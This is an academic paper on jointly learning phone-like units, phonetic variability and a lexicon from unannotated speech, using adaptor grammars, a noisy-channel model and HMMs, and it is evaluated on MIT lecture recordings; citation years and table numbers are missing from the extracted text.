one of the most basic problems of language acquisition is accounting for how children learn the inventory of word forms from speech—phonological lexicon discovery. in learning a language, children face a number of challenging, mutually interdependent inference problems. words are represented in terms of phonemes, the basic phonological units of a language. however, phoneme inventories vary from language to language, and the underlying phonemes which make up individual words often have variable acoustic realizations due to systematic phonetic and phonological variation, dialect differences, speech style, environmental noise, and other factors. to learn the phonological form of words in their language children must determine the phoneme inventory of their language, identify which parts of the acoustic signal correspond to which phonemes—while discounting surface variation in the realization of individual units—and infer which sequences of phonemes correspond to which words (amongst other challenges). understanding the solution to this complex joint-learning problem is not only of fundamental scientific interest, but also has important applications in spoken language processing (slp). even setting aside additional grammatical and semantic information available to child learners, there is still a sharp contrast between the type of phonological learning done by humans and current slp methods.
tasks that involve recognizing words from acoustic input—such as automatic speech recognition and spoken term discovery—only tackle parts of the overall problem, and typically rely on linguistic resources such as phoneme inventories, pronunciation dictionaries, and annotated speech data. such resources are unavailable for many languages, and expensive to create. thus, a model that can jointly learn the sound patterns and the lexicon of a language would open up the possibility of automatically developing slp capabilities for any language. in this paper, we present a first step towards an unsupervised model of phonological lexicon discovery that is able to jointly learn, from unannotated speech, an underlying phoneme-like inventory, the pattern of surface realizations of those units, and a set of lexical units for a language. our model builds on earlier work addressing the unsupervised discovery of phone-like units from acoustic data—in particular the dirichlet process hidden markov model (dphmm) of lee and glass ( )—and the unsupervised learning of lexicons from unsegmented symbolic sequences using the adaptor grammar (ag) framework (johnson et al., ; johnson and goldwater, a). we integrate these models with a component modeling variability in the surface realization of phoneme-like units within lexical units. in the next section, we give an overview of related work. following this, we present our model and inference algorithms. we then turn to preliminary evaluations of the model's performance, showing that the model is competitive with state-of-the-art single-speaker spoken term discovery systems, and providing several analyses which examine the kinds of structures learned by the model. we also suggest that the ability of the system to successfully unify multiple acoustic sequences into single lexical items relies on the phonological-variability (noisy channel) component of the model—demonstrating the importance of modeling symbolic variation in phonological units. we provide preliminary evidence that simultaneously learning sound and lexical structure leads to synergistic interactions (johnson, b)—the various components of the model mutually constrain one another such that the linguistic structures learned by each are more accurate than if they had been learned independently.
related work
previous models of lexical unit discovery have primarily fallen into two classes: models of spoken term discovery and models of word segmentation. both kinds of models have sought to identify lexical items from input without direct supervision, but have simplified the joint learning problem discussed in the introduction in different ways.
spoken term discovery
spoken term discovery is the problem of using unsupervised pattern discovery methods to find previously unknown keywords in speech. most models in this literature have typically made use of a two-stage procedure: first, subsequences of the input that are similar in an acoustic feature space are identified, and then clustered to discover categories corresponding to lexical items (park and glass, ; zhang and glass, ; zhang et al., ; jansen et al., ; aimetti, ; mcinnes and goldwater, ).
this problem was first examined by park and glass ( ) who used dynamic time warping to identify similar acoustic sequences across utterances. the input sequences discovered by this method were then treated as nodes in a similarity-weighted graph, and graph clustering algorithms were applied to produce a number of densely connected groups of acoustic sequences, corresponding to lexical items. building on this work, zhang and glass ( ) and zhang et al. ( ) proposed robust features that allowed lexical units to be discovered from spoken documents generated by different speakers. jansen et al. ( ) present a similar framework for finding repeated acoustic patterns, based on line-segment detection in dotplots. other variants of this approach include mcinnes and goldwater ( ) who compute similarity incrementally, and aimetti ( ) who integrates a simplified, symbolic representation of visual information associated with each utterance.
word segmentation
in contrast to spoken term discovery, models of word (or morpheme) segmentation start from unsegmented strings of symbols and attempt to identify subsequences corresponding to lexical items. the problem has been the focus of many years of intense research, and there are a large variety of proposals in the literature (harris, ; saffran et al., a; harris, ; olivier, ; saffran et al., b; brent, b; frank et al., ; frank et al., ). of particular interest here are models which treat segmentation as a secondary consequence of discovering a compact lexicon which explains the distribution of phoneme sequences in the input (cartwright and brent, ; brent, a; goldsmith, ; argamon et al., ; goldsmith, ; creutz and lagus, ; goldwater et al., ; mochihashi et al., ; elsner et al., ; neubig et al., ; heymann et al., ; de marcken, c; de marcken, a). recently, a number of such models have been introduced which make use of bayesian nonparametric distributions such as the dirichlet process (ferguson, ) or its two-parameter generalization, the pitman-yor process (pitman, ), to define a prior which favors smaller lexicons with more reusable lexical items. the first such models were proposed in goldwater ( ) and, subsequently, have been extended in a number of ways (goldwater et al., ; neubig et al., ; heymann et al., ; mochihashi et al., ; elsner et al., ; johnson et al., ; johnson and demuth, ; johnson and goldwater, b; johnson, a; johnson, b).
a series of studies using the framework has shown that including such additional structure can markedly improve lexicon discovery (johnson et al., ; johnson and demuth, ; johnson and goldwater, b; johnson, a; börschinger and johnson, ; johnson, b).

unsupervised lexicon discovery. in contrast to models of spoken term discovery and word segmentation, our model addresses the problem of jointly inferring phonological and lexical structure directly from acoustic input. spoken term discovery systems only attempt to detect keywords, finding lexical items that are isolated and scattered throughout the input data. they do not learn any intermediate levels of linguistic structure between the acoustic input and discovered lexical items. in contrast, our model attempts to find a complete segmentation of the input data into units at multiple levels of abstraction (e.g., phonemes, syllables, words, etc.). unlike word segmentation models, our model works directly from speech input, integrating unsupervised acoustic modeling with an approach to symbolic lexicon discovery based on adaptor grammars.

although some earlier systems have examined various parts of the joint learning problem (bacchiani and ostendorf, ; de marcken, b), to our knowledge, the only other system which addresses the entire problem is that of chung et al. ( ). there are two main differences between the approaches. first, in chung et al. ( ), word-like units are defined as unique sequences of sub-word-like units, so that any variability in the realization of word-parts must be accounted for by the acoustic models. in contrast, we explicitly model phonetic variability at the symbolic level, allowing our system to learn low-level units which tightly predict the acoustic realization of phonemes in particular contexts, while still ignoring this variability when it is irrelevant to distinguishing lexical items. second, while chung et al. ( ) employ a fixed, two-level representation of linguistic structure, our use of adaptor grammars to model symbolic lexicon discovery means that we can easily and flexibly vary our assumptions about the hierarchical makeup of utterances and lexical items. in this paper, we employ a simple adaptor grammar with three levels of hierarchical constituency (word-like, sub-word-like, and phone-like units) and with right-branching structure; future work could explore more articulated representations along the lines of johnson ( b).

model

problem formulation and model overview. given a corpus of spoken utterances, our model aims to jointly infer the phone-like, sub-lexical, and lexical units in each spoken utterance. to discover these hierarchical linguistic structures directly from acoustic signals, we divide the problem into three sub-tasks: (1) phone-like unit discovery, (2) variability modeling, and (3) sub-lexical and lexical unit learning. each of the sub-tasks corresponds to certain latent structures embedded in the speech data that our model must identify. here we briefly discuss the three sub-tasks as well as the latent variables associated with each, and provide an overview of the proposed model for each sub-task.

figure : (a) an overview of the proposed model for inducing hierarchical linguistic structures directly from acoustic signals. as indicated in the graph, the model leverages partial knowledge learned from each level to drive discovery in the others.
(b) an illustration of an input example, xi, and the associated latent structures in the acoustic signals di,ui,oi,~vi,zi. these latent structures can each be discovered by one of the three components of the model as specified by the red horizontal bars between (a) and (b). phone-like unit discovery for this sub-task, the model converts the speech input xi into a sequence of phone-like units (plus), ~vi, which implic- itly determines the phone segmentation, zi, in the speech data as indicated in (iv)-(vi) of fig -(b). we use xi = {xi,t|xi,t ∈ r , ≤ t ≤ ti} to denote the series of mel-frequency cepstral coefficients (mfccs) representing the ith utterance (davis and mermelstein, ), where ti stands for the total number of feature frames in utterance i. each xi contains -dimensional mfccs and their first- and second-order time derivatives at a ms frame rate. each xi is also associated with a binary variable zi,t, indicating whether a plu boundary exists between xi,t and xi,t+ . the feature vectors with zi,t = are highlighted by the dark blue bars in fig. -(vi), which correspond to segment boundaries. each speech segment is labelled with a plu id vi,j,k ∈ l, in which l is a set of integers that rep- resent the plu inventory embedded in the speech corpus. we denote the sequence of plu ids asso- ciated with utterance i using ~vi as shown in fig. - (iv), where ~vi = {vi,j| ≤ j ≤ ji} and vi,j = {vi,j,k|vi,j,k ∈ l, ≤ k ≤ |vi,j|}. the variable ji is defined in the discussion of the second sub-task. as depicted in fig. -(a), we construct an acoustic model to approach this sub-problem. the acoustic model is composed of a set of hidden markov mod- els (hmms), π, that are used to infer and model the plu inventory from the given data. phonological variability modeling in conversa- tional speech, the phonetic realization of a word can easily vary because of phonological and phonetic context, stress pattern, etc. without a mechanism that can map these speech production variations into a unique representation, any model that induces lin- guistic structures based on phonetic input would fail to recognize these pronunciations as instances of the same word type. we exploit a noisy-channel model to address this problem and design three edit opera- tions for the noisy-channel model: substitute, split, and delete. each of the operations takes a plu as an input and is denoted as sub(u), split(u), and del(u) respectively. we assume that for every inferred se- quence of plus ~vi in fig. -(b)-(iv), there is a cor- responding series of plus, ui = {ui,j| ≤ j ≤ ji}, in which the pronunciations for any repeated word in ~vi are identical. the variable ji indicates the length of ui. by passing each ui,j through the noisy- channel model, which stochastically chooses an edit operation oi,j for ui,j, we obtain the noisy phonetic realization vi,j. the relationship among ui, oi, and ~vi is shown in (ii)-(iv) of fig. -(b). for notation simplicity, we let oi,j encode ui,j and vi,j, which means we can read ui,j and vi,j directly from oi,j. we refer to the units that are input to the noisy- channel model ui as “top-layer” plus and the units that are output from the noisy-channel model ~vi as “bottom-layer” plus. we denote vi,j as a vector since if a split operation is cho- sen for ui,j, the noisy-channel model will output two plus. sub-word-like and word-like unit learning with the standardized phone-like representation ui, higher-level linguistic structures can be inferred for each spoken utterance. 
we employ adaptor grammars (ags) (johnson et al., ) to achieve this goal, and use di to denote the parse tree that encodes the hierarchical linguistic structures in fig. -(b)-(i). we bracket sub-word-like (e.g., syllable) and word-like units using [·] and (·), respectively.

in summary, our model integrates adaptor grammars with a noisy-channel model of phonetic variability and an acoustic model to discover hierarchical linguistic structures directly from acoustic signals. even though we have discussed these sub-tasks in a bottom-up manner, our model provides a joint learning framework, allowing knowledge learned from one sub-task to drive discovery in the others. we now review the formalization of adaptor grammars and define the noisy-channel and acoustic components of our model. we conclude this section by presenting the generative process implied by the three components of our model.

adaptor grammars. adaptor grammars are a non-parametric bayesian extension of probabilistic context-free grammars (pcfgs). a pcfg can be defined as a quintuple $(N, T, R, S, \{\vec{\theta}^{q}\}_{q \in N})$, which consists of disjoint finite sets of non-terminal symbols $N$ and terminal symbols $T$, a finite set of production rules $R \subseteq \{N \rightarrow (N \cup T)^{*}\}$, a start symbol $S \in N$, and vectors of probabilistic distributions $\{\vec{\theta}^{q}\}_{q \in N}$. each $\vec{\theta}^{q}$ contains the probabilities associated with the rules that have the non-terminal $q$ on their left-hand side. we use $\theta_{r}$ to indicate the probability of rule $r \in R$. we adopt a bayesian approach and impose a dirichlet prior on each $\vec{\theta}^{q} \sim \mathrm{Dir}(\vec{\alpha}^{q})$.

let $t$ denote a complete derivation, which represents either a tree that expands from a non-terminal $q$ to its leaves, which contain only terminal symbols, or a tree that is composed of a single terminal symbol. we define $\mathrm{root}(t)$ as a function that returns the root node of $t$ and denote the $k$ immediate subtrees of the root node as $\hat{t}_{1}, \cdots, \hat{t}_{k}$. the probability distribution over $\mathcal{T}^{q}$, the set of trees that have $q \in N \cup T$ as the root, is recursively defined as follows.

$$G^{q}_{\mathrm{PCFG}}(t) = \begin{cases} \sum_{r \in R_{q}} \theta_{r} \prod_{i=1}^{k} G^{\mathrm{root}(\hat{t}_{i})}_{\mathrm{PCFG}}(\hat{t}_{i}) & \mathrm{root}(t) = q \in N \\ 1 & \mathrm{root}(t) = q \in T \end{cases}$$

an adaptor grammar is a sextuple $(N, T, R, S, \{\vec{\theta}^{q}\}_{q \in N}, \{Y^{q}\}_{q \in N})$, in which $(N, T, R, S, \{\vec{\theta}^{q}\}_{q \in N})$ is a pcfg, and $\{Y^{q}\}_{q \in N}$ is a set of adaptors for the non-terminals. an adaptor $Y^{q}$ is a function that maps a base distribution over $\mathcal{T}^{q}$ to a distribution over distributions over $\mathcal{T}^{q}$. the distribution $G^{q}_{\mathrm{AG}}(t)$ for $q \in N$ of an ag is a sample from this distribution over distributions. specifically,

$$G^{q}_{\mathrm{AG}}(t) \sim Y^{q}(H^{q}(t)), \qquad H^{q}(t) = \sum_{r \in R_{q}} \theta_{r} \prod_{i=1}^{k} G^{\mathrm{root}(\hat{t}_{i})}_{\mathrm{AG}}(\hat{t}_{i}),$$

where $H^{q}(t)$ denotes the base distribution over $\mathcal{T}^{q}$. in this paper, following johnson et al. ( ), we use adaptors that are based on pitman-yor processes (pitman and yor, ). for terminal symbols $q \in T$, we define $G^{q}_{\mathrm{AG}}$ to be the distribution that puts all its probability mass on the single-node tree labelled $q$. conceptually, ags can be regarded as pcfgs with memories that cache the complete derivations of adapted non-terminals, allowing the ag to choose to either reuse the cached trees or select an underlying production rule in $R$ to expand each non-terminal. for a more detailed description of ags and their connection to pcfgs, we refer readers to johnson et al. ( ) and the relevant chapter of o'donnell ( ).
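to make the caching behavior of a pitman-yor adaptor concrete, the sketch below implements a toy two-parameter chinese-restaurant-style cache that either reuses a previously generated draw or falls back to the base distribution. this is a minimal illustration only: the base sampler, the discount and concentration values, and the string labels are placeholder assumptions, not the grammar, hyperparameters, or implementation used in the paper.

```python
# A toy Pitman-Yor "adaptor": it either reuses a previously cached draw
# (a stored derivation, in adaptor-grammar terms) or calls the base
# distribution for a fresh one.
import random

class PitmanYorAdaptor:
    def __init__(self, discount, concentration, base_sampler):
        assert 0.0 <= discount < 1.0 and concentration > -discount
        self.d, self.a = discount, concentration
        self.base = base_sampler
        self.tables = []          # one entry per cached draw: [label, count]

    def sample(self):
        n = sum(c for _, c in self.tables)
        k = len(self.tables)
        # Mass for opening a new "table" (a newly cached derivation).
        p_new = (self.a + self.d * k) / (self.a + n) if n > 0 else 1.0
        if random.random() < p_new:
            label = self.base()
            self.tables.append([label, 1])
            return label
        # Otherwise reuse an existing table, chosen proportionally to count - d.
        r = random.random() * (n - self.d * k)
        for entry in self.tables:
            r -= entry[1] - self.d
            if r <= 0:
                entry[1] += 1
                return entry[0]
        entry = self.tables[-1]   # numerical fallback
        entry[1] += 1
        return entry[0]

# Frequently generated items quickly become cheap to reuse.
adaptor = PitmanYorAdaptor(0.5, 1.0, lambda: random.choice("abcde"))
print([adaptor.sample() for _ in range(20)])
```

as in the grammar itself, items that recur often accumulate counts and are increasingly likely to be reused rather than rebuilt from the base distribution.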
to discover the latent hierarchical linguistic structures in spoken utterances, we employ the following ag to parse each spoken utterance, where we adopt the notations of johnson and goldwater ( b), use underlines to indicate adapted non-terminals, and employ + to abbreviate right-branching recursive rules for non-terminals. the last rule shows that the terminals of this ag are the plu ids, which are represented as ui and depicted as the units in the squares of fig. -(b)-(ii).

sentence → word+
word → sub-word+
sub-word → phone+
phone → l, for l ∈ L

note that the grammar above only makes use of right-branching rules and therefore could be simulated using finite-state infrastructure, rather than the more complex context-free machinery implicit in the adaptor grammars framework. we nevertheless make use of the formalism for two reasons. first, on a theoretical level it provides a uniform framework for expressing many different assumptions about the symbolic component of segmentation models (goldwater et al., ; johnson, b; börschinger and johnson, ; johnson, a; johnson and goldwater, b; johnson and demuth, ). using adaptor grammars to formalize the symbolic component of our model thus allows direct comparisons to this literature as well as transparent extensions following earlier work. second, on a practical level, using the framework allowed us to make use of mark johnson's efficient implementation of the core adaptor grammar sampling loop, significantly reducing model development time.

noisy-channel model. we formulate the noisy-channel model as a pcfg and encode the substitute, split, and delete operations as grammar rules. in particular, for $l \in L$,

$$l \rightarrow l' \;\; \text{for } l' \in L, \qquad l \rightarrow l'_{1}\, l'_{2} \;\; \text{for } l'_{1}, l'_{2} \in L, \qquad l \rightarrow \epsilon,$$

where $l \in L$ are the start symbols as well as the non-terminals of the pcfg. the terminals of this pcfg are $l' \in L$, which correspond to bottom-layer plus ~vi that are depicted as units in circles in fig. -(b)-(iv). note that $\{l\}$ and $\{l'\}$ are drawn from the same inventory of plus, and the notation is meant to signal that $\{l'\}$ are the terminal symbols of this grammar. the three sets of rules respectively map to the sub(·), split(·), and del(·) operations; thus, the probability of each edit operation is automatically captured by the corresponding rule probability. note that to simultaneously infer a phonetic inventory of an unknown size and model phonetic variation, we can use the infinite pcfg (liang et al., ) to formulate the noisy-channel model. however, for computational efficiency, in our experiments, we infer the size of the plu inventory before training the full model, and impose a dirichlet prior on the rule probability distribution associated with each non-terminal $l$. we explain how inventory size is determined in sec. .

acoustic model. finally, we assign each discovered plu $l \in L$ to an hmm, πl, which is used to model the speech realization of each phonetic unit in the feature space. in particular, to capture the temporal dynamics of the features associated with a plu, each hmm contains three emission states, which roughly correspond to the beginning, middle, and end of a phonetic unit (jelinek, ). we model the emission distribution of each state by using -dimensional diagonal gaussian mixture models (gmms). the prior distributions embedded in the hmms are the same as those described in lee and glass ( ).
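as a concrete illustration of the three rule types, the sketch below rewrites a top-layer plu sequence into a bottom-layer one by applying substitute, split, or delete operations. the inventory, the operation probabilities, and the uniform choice of the substituted symbol are placeholder assumptions; in the model each of these corresponds to a learned rule probability rather than a fixed constant.

```python
# Toy version of the noisy-channel rewrite: each top-layer PLU is either
# substituted by one bottom-layer PLU, split into two, or deleted.
import random

INVENTORY = list(range(10))          # placeholder PLU ids

def rewrite(top_layer, p_sub=0.8, p_split=0.1, p_del=0.1):
    bottom_layer = []
    for u in top_layer:
        r = random.random()
        if r < p_sub:                          # l -> l'
            # Drawn uniformly here for simplicity; the model learns a
            # separate probability for each (l, l') pair.
            bottom_layer.append(random.choice(INVENTORY))
        elif r < p_sub + p_split:              # l -> l'1 l'2
            bottom_layer.extend(random.choices(INVENTORY, k=2))
        # else: l -> epsilon (delete), emit nothing
    return bottom_layer

top = [3, 1, 4, 1, 5]                 # a top-layer PLU sequence (placeholder)
print(rewrite(top))
```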
generative process of the proposed model. with the adaptor grammar, the noisy-channel model, and the acoustic model defined, we summarize the generative process implied by our model as follows. for the ith utterance in the corpus, our model

1. generates a parse tree di from $G^{\mathrm{sentence}}_{\mathrm{AG}}(\cdot)$.
2. for each leaf node ui,j of di, samples an edit rule oi,j from $\vec{\theta}^{u_{i,j}}$ to convert ui,j to vi,j.
3. for $v_{i,j,k} \in v_{i,j}$, $1 \le k \le |v_{i,j}|$, generates the speech features using $\pi_{v_{i,j,k}}$, which deterministically sets the value of zi,t.

thus, the latent variables our model defines for each utterance are: di, ui, oi, ~vi, zi, π, and $\{\vec{\theta}^{q}\}_{q \in N_{\mathrm{AG}} \cup N_{\mathrm{noisy\text{-}channel}}}$. in the next section, we derive inference methods for all the latent variables except for $\{\vec{\theta}^{q}\}_{q \in N_{\mathrm{AG}} \cup N_{\mathrm{noisy\text{-}channel}}}$, which we integrate out during the inference process.

inference

we exploit markov chain monte carlo algorithms to generate samples from the posterior distribution over the latent variables. in particular, we construct three markov chain kernels: (1) jointly sampling di, oi, ui, (2) generating new samples for ~vi, zi, and (3) updating π. here, we give an overview of each of the sampling moves.

sampling di, oi, and implicitly ui. we employ the metropolis-hastings (mh) algorithm (chib and greenberg, ) to generate samples for di and oi, which implicitly determines ui. given d−i, o−i, the current parses and the current edit operations associated with all the sentences in the corpus except the ith utterance, we can construct a proposal distribution for d′i and o′i (we use di and d′i to denote the current and the proposed parses, and similarly for oi and o′i) by using the approximating pcfg described in johnson et al. ( ) and the approximated probability of o′i,j in o′i, which is defined in the following equation.

$$p(o'_{i,j} \mid o_{-i}; \{\vec{\alpha}^{q}\}) \approx \frac{c_{-i}(u'_{i,j} \rightarrow v'_{i,j}) + \alpha^{u'_{i,j}}_{u'_{i,j} \rightarrow v'_{i,j}}}{c_{-i}(u'_{i,j}) + \sum_{r \in R_{u'_{i,j}}} \alpha^{u'_{i,j}}_{r}}$$

here $q \in N_{\mathrm{noisy\text{-}channel}}$, and $c_{-i}(w)$ denotes the number of times that $w$ is used in the analyses for the corpus, excluding the ith utterance, in which $w$ can be any countable entity such as a rule or a symbol. more specifically, we combine the pcfg that approximates the adaptor grammar with the noisy-channel pcfg whose rules are weighted as in the equation above to form a new pcfg g′. the new pcfg g′ is thus a grammar that can be used to parse the terminals ~vi and generate derivations that are rooted at the start symbol of the ag. therefore, we transform the task of sampling d′i and o′i to the task of generating a parse for ~vi using g′, which can be efficiently solved by using a variant of the inside algorithm for pcfgs (lari and young, ; johnson et al., ; goodman, ; finkel et al., ).

sampling ~vi and zi. given the top-layer plus ui and the speech data xi, sampling the boundary variables zi and the bottom-layer plus ~vi is equivalent to sampling an alignment between ui and xi. therefore, we use the probabilities defined by the acoustic model and employ the backward message-passing and forward-sampling algorithm described in lee et al. ( ), designed for aligning a letter sequence and speech signals, to propose samples for ~vi and zi. the proposals are then accepted by using the standard mh criterion.

sampling π. given zi and ~vi of each utterance in the corpus, generating new samples for the parameters of each hmm πl for $l \in L$ is straightforward. for each plu $l$, we gather all speech segments that are mapped to a bottom-layer plu $v_{i,j,k} = l$. for every segment in this set, we use πl to block-sample the state id and the gmm mixture id for each feature vector. from the state and mixture assignments, we can collect the counts that are needed to update the priors for the transition probability and the emission distribution of each state in πl. new samples for the parameters of πl can thus be yielded from the updated priors.
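the proposal weight for an edit rule in the first sampling move is essentially a smoothed relative frequency; the sketch below computes it from rule counts plus dirichlet pseudo-counts. the counts, the symmetric alpha, and the restriction to single-symbol outputs (split rules are omitted for brevity) are simplifying placeholder assumptions rather than the paper's actual configuration.

```python
# Approximate probability of an edit rule u -> v from counts over the rest
# of the corpus plus Dirichlet pseudo-counts, in the spirit of the
# Metropolis-Hastings proposal described above.
from collections import Counter

def rule_proposal_prob(u, v, rule_counts, rules_for_u, alpha=0.5):
    """rule_counts[(u, r)] = #times u -> r was used, excluding utterance i."""
    numerator = rule_counts[(u, v)] + alpha
    denominator = (sum(rule_counts[(u, r)] for r in rules_for_u)
                   + alpha * len(rules_for_u))
    return numerator / denominator

counts = Counter({("a", "a"): 40, ("a", "b"): 5, ("a", ""): 2})  # "" = delete
print(rule_proposal_prob("a", "b", counts, rules_for_u=["a", "b", "c", ""]))
```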
experimental setup

dataset. to the best of our knowledge, there are no standard corpora for evaluating models of unsupervised lexicon discovery. in this paper, we perform experiments on the six lecture recordings used in (park and glass, ; zhang and glass, ), a part of the mit lecture corpus (glass et al., ). a brief summary of the six lectures is listed in table .

table : a brief summary of the six lectures used for the experiments reported in section . the lectures cover economics, speech processing, clustering, speaker adaptation, physics, and linear algebra, with the duration of each lecture given in minutes.

systems. full system: we constructed two systems based on the model described in sec. . these systems, fulldp and full, differ only in the size of the plu inventory (k). for fulldp, we set the value of k to be the number of plus discovered for each lecture by the dphmm framework presented in (lee and glass, ); these numbers were determined separately for each of the six lectures. for full, we used a fixed plu inventory size k.

the acoustic component of the fulldp system was initialized by using the output of the dphmm model for each lecture. specifically, we made use of the hmms, the phone boundaries, and the plus that the dphmm model found as the initial values for π, zi, and ~vi of the fulldp system. after initialization, the training of fulldp proceeds by following the three sampling moves described in sec. . similarly, we employ a hierarchical hmm (hhmm), which is presented in detail in (lake et al., ), to find the initial values of π, zi, and ~vi for the full system. the adaptor grammar component of all systems was initialized following the "batch initialization" method described in johnson and goldwater ( b), which independently samples an ag analysis for each utterance. the lesioned systems that are described in the rest of this section were also initialized in the same manner.

to reduce the inference load on the hmms, we exploit acoustic cues in the feature space to constrain phonetic boundaries to occur at a subset of all possible locations (lee and glass, ). we follow the pre-segmentation method described in (glass, ) to achieve this goal. empirically, this boundary elimination heuristic reduces the computational complexity of the inference algorithm by roughly an order of magnitude on clean speech corpora.

no acoustic model: we remove the acoustic model from fulldp and full to obtain the -am systems. since the -am systems do not have an acoustic model, they cannot resegment or relabel the data, which implies that there is no learning of phonetic units in the -am systems, making them similar to symbolic segmentation models that include a noisy channel component (elsner et al., ). by comparing a -am system to its full counterpart, we can investigate the synergies between phonetic and lexical unit acquisition in the full model.

no noisy-channel: to evaluate the importance of modeling phonetic variability, we remove the noisy-channel model from the -am systems to form -nc systems.
a -nc system can be regarded as a pipeline, whereby utterance phone sequences are discovered first, and latent higher-level linguistic structures are learned in the second step; it is thus similar to models such as that of jansen et al. ( ).

results and analyses

training convergence. fig. shows the negative log posterior probability of the sampled parses d and edit operations o for each lecture as a function of iteration, generated by the fulldp system. given that each lecture consists of roughly only one hour of speech data, we can see that the model converges fairly quickly, within a couple hundred iterations. in this section, we report the performance of each system using the corresponding sample from the th iteration.

figure : the negative log posterior probability of the latent variables d and o as a function of iteration obtained by the fulldp model for each lecture (one curve per lecture, plotting −log p(d, o | x) against the number of iterations).

phoneme segmentation. we first evaluate our model on the task of phone segmentation for the six lectures. we use a speech recognizer to produce phone forced alignments for each lecture. the phone segmentation embedded in the forced alignments is then treated as the gold standard to which we compare the segmentation our model generates. we follow the suggestion of (scharenborg et al., ) and use a -ms tolerance window to compute the f score of all proposed phone segmentations.

table presents the f scores achieved by different systems. because the -am and -nc systems do not do inference over acoustic segmentations, we compare the phoneme-segmentation performance of each full system to its performance at initialization. recall that the full system is initialized using the output of a hierarchical hmm (hhmm), and the fulldp system is initialized using the dphmm.

table : the f scores for the phone segmentation task obtained by the full systems and their corresponding initialization systems (columns: full, hhmm, fulldp, dphmm; one row per lecture).

table : f scores for word segmentation obtained by the full systems and their ablated systems (columns: full, -am, -nc, fulldp, -am, -nc; one row per lecture).

from the table we can see that the two -am systems, and equivalently the two initialization systems whose segmentations they inherit, achieve roughly the same segmentation performance for the first four lectures. aside from using the boundary elimination method described in (lee and glass, ), these two systems are trained independently. thus, their narrow performance gap indicates that the two initialization systems may have already found a near-optimal segmentation. since our model also looks for the best segmentation in the same hypothesis space, by initializing the boundary variables around the optimum, our model should simply maintain the segmentation. in particular, as shown in the table, the full systems also achieve about the same performance as the -am systems for the first four lectures, with the overall largest performance difference being . %. it is perhaps more interesting when the initialization system gets stuck at a local optimum.
by comparing the performance of the two -am systems for the last two lectures, we can see that the initialization of the full system converges to local optima for these two lectures. nonetheless, as shown in the table, the full system is able to improve the given initial segmentation and reach a performance similar to that accomplished by the fulldp system and the initialization of the fulldp system.

word segmentation. in addition to phone segmentation, we also evaluate our model on the task of word segmentation. similar to how we generate the gold standard segmentation for the previous task, we use a speech recognizer to produce word alignments and obtain the word segmentation for each lecture. we then compare the word segmentation that our systems generate to the gold standard and calculate the f scores by using a -ms tolerance window. by comparing the full systems to their -nc counterparts, we can see that the noisy-channel model plays an important role for word segmentation, which resonates with the findings in elsner et al. ( ). without the capability of modeling phonetic variability, it is difficult, or even impossible, for the -nc systems to recognize word tokens of the same type but with different phonetic realizations.

we can also observe the advantage of jointly learning word-level and phone-level representations by comparing the fulldp system to the corresponding -am model. on average, the fulldp system outperforms its -am ablated counterpart by . % on the word segmentation task, which indicates that the top-down word-level information can help refine the phone-level knowledge that the model has learned. while similar improvements are only observed in two lectures for the full system and its -am version, we believe this is because the full system does not have as much flexibility to infer the phonetic embeddings as the fulldp system. this inflexibility may have prevented the full system from fully exploiting the top-down information for learning.

table : the number of the target words discovered by each system described in sec. , by the baseline (park and glass, ), and by the state-of-the-art system (zhang, ), with the best performance achieved for each lecture shown in bold (columns: full, -am, -nc, fulldp, -am, -nc, p&g, zhang; one row per lecture).

finally, note that even though the f scores for the word segmentation task are low, we find similar performance reported in jansen et al. ( ). we would like to raise the question of whether the conventional word segmentation task is a proper evaluation method for an unsupervised model such as the one described in this paper. our thought is twofold. first, correct segmentation is vaguely defined: by choosing different tolerance windows, different segmentation performance is obtained. second, as we show later, many of the units discovered by our model are linguistically meaningful, although they do not always strictly correspond to words (i.e., the units may be morphemes or collocations, etc.). since these are linguistically meaningful units which should be identified by an unsupervised lexical discovery model, it is not clear what advantage would be gained by privileging words in the evaluation. nevertheless, we present the word segmentation performance achieved by our model in this paper for future reference.
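both segmentation evaluations above score hypothesized boundaries against forced-alignment boundaries within a tolerance window. the sketch below shows one minimal way to compute such a boundary f score; the 0.02 s window and the boundary times are placeholder assumptions rather than the exact evaluation used here.

```python
# Boundary F1 with a tolerance window: each hypothesized boundary may match
# at most one unused reference boundary within the window.
def boundary_f1(reference, hypothesis, tolerance=0.02):
    matched, used = 0, set()
    for h in hypothesis:
        for idx, r in enumerate(reference):
            if idx not in used and abs(h - r) <= tolerance:
                matched += 1
                used.add(idx)
                break
    precision = matched / len(hypothesis) if hypothesis else 0.0
    recall = matched / len(reference) if reference else 0.0
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)

ref = [0.12, 0.48, 0.91, 1.30]        # gold boundary times in seconds (placeholder)
hyp = [0.13, 0.50, 0.75, 1.29, 1.60]  # proposed boundary times
print(round(boundary_f1(ref, hyp), 3))
```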
coverage of words with high tfidf scores. to assess the performance of our model, we evaluate the degree to which it was able to correctly recover the vocabulary used in the input corpora. to facilitate comparison with the baseline (park and glass, ) and state-of-the-art (zhang, ) spoken term discovery systems, we restrict attention to the top tfidf-scoring words for each lecture. note that the set of target words for each lecture was originally chosen in (park and glass, ) and used as the evaluation set in both park and glass ( ) and zhang ( ). to compare our system directly to previous work, we use the same set of target words to test our model.

table summarizes the coverage achieved by each variant of our model as well as the two spoken term discovery systems. note that these two systems differ only in the acoustic features used to represent the input: mfcc features versus more robust gaussian posteriorgrams, respectively. both the fulldp and full systems consistently outperform the baseline. both systems also exceed or perform as well as the state-of-the-art system on most lectures. furthermore, they do so using the less robust mfcc feature-based acoustic representation.

the results in the table also illustrate the synergistic interactions that occur between the acoustic and symbolic model components. as described in sec. , the -am systems are identical to the full systems, except they do not include the acoustic model, and, therefore, do not re-segment or relabel the speech after initialization. as the table shows, the full and fulldp models both tend to have coverage which is as good as, or better than, the corresponding models without an acoustic component. this indicates that top-down pressure from the symbolic component can refine bottom-layer plus, leading, ultimately, to better lexicon discovery.

finally, the comparison between the full/-am models and their -nc counterparts suggests the importance of modeling variability in the realization of phonemes. as we will discuss in the next section, the full model tends to merge multiple sequences of bottom-layer plus into single lexical items which share a single top-layer plu sequence. the results in the table confirm this: when the model does not have the option of collapsing bottom-layer plu sequences, word discovery degrades considerably. (for the procedure used to identify the word label for each lexical unit, we refer the reader to sec. of lee ( ) for a detailed explanation.)

